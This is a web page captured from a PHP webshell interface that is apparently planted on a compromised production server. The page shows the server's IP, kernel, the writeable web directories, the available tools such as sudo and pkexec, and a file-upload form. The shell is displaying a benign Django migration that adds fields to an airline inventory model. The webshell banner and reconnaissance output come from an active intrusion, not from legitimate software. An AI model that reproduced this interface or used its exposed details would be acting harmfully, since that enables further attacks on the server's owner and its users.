403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/api.hellogtx.com/apihellogtx/flightinventory/migrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/api.hellogtx.com/apihellogtx/flightinventory/migrations/0020_auto_20201231_1210.py
# Generated by Django 3.1.2 on 2020-12-31 06:40

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('flightinventory', '0019_auto_20201228_2133'),
    ]

    operations = [
        migrations.AddField(
            model_name='airlineinventory',
            name='AirLines',
            field=models.CharField(default='', max_length=64, verbose_name='Air Lines'),
        ),
        migrations.AddField(
            model_name='airlineinventory',
            name='FromCityCode',
            field=models.CharField(default='', max_length=64, verbose_name='From City Code'),
        ),
        migrations.AddField(
            model_name='airlineinventory',
            name='Stops',
            field=models.CharField(default='', max_length=64, verbose_name='Stops'),
        ),
        migrations.AddField(
            model_name='airlineinventory',
            name='ToCityCode',
            field=models.CharField(default='', max_length=64, verbose_name='To City Code'),
        ),
        migrations.AlterField(
            model_name='airlineprice',
            name='FlightInventory',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='airlineprices', to='flightinventory.flightinventory', verbose_name='Flight Inventory'),
        ),
    ]

Youez - 2016 - github.com/yon3zu
LinuXploit